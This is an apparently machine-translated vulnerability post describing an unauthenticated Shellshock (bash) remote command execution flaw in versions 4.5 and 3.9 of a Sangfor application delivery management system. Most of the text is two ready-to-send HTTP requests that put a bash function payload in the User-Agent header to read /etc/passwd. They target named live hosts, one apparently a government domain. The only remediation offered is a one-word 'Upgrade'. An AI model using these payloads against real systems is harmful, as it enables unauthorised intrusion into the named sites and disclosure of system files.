Sangfor a management system product BASH Remote Command Execution Vulnerability (no login required)

Sangfor a management system product BASH Remote Command Execution Vulnerability (no login required)

Sangfor a system BASH Remote Command Execution Vulnerability

Sangfor application Delivery Management System. Multiple versions have the bash remote command execution vulnerability.

Both versions 4.5 and 3.9 have vulnerabilities.



Release 4.5

Https://cxxjs.com/cgi-bin/login.cgi? Action = log & fro = self #

Host: cxxjs.comUser-Agent: () { :;}; echo  `/bin/cat /etc/passwd`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: adx_flag=1819988463DNT: 1Connection: keep-aliveCache-Control: max-age=0</code>

It will be displayed directly on the homepage, or click to view the version.
 

Release 3.9

Https://xtds.gov.cn/cgi-bin/login.cgi? Action = log & fro = self & rand = 0.12944530067034066 #

Host: xtds.gov.cnUser-Agent: () { :;}; echo  `/bin/cat /etc/passwd`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: keep-alive</code>

Click production to view the version. The content is the content of passwd.
 

 

Solution:

Upgrade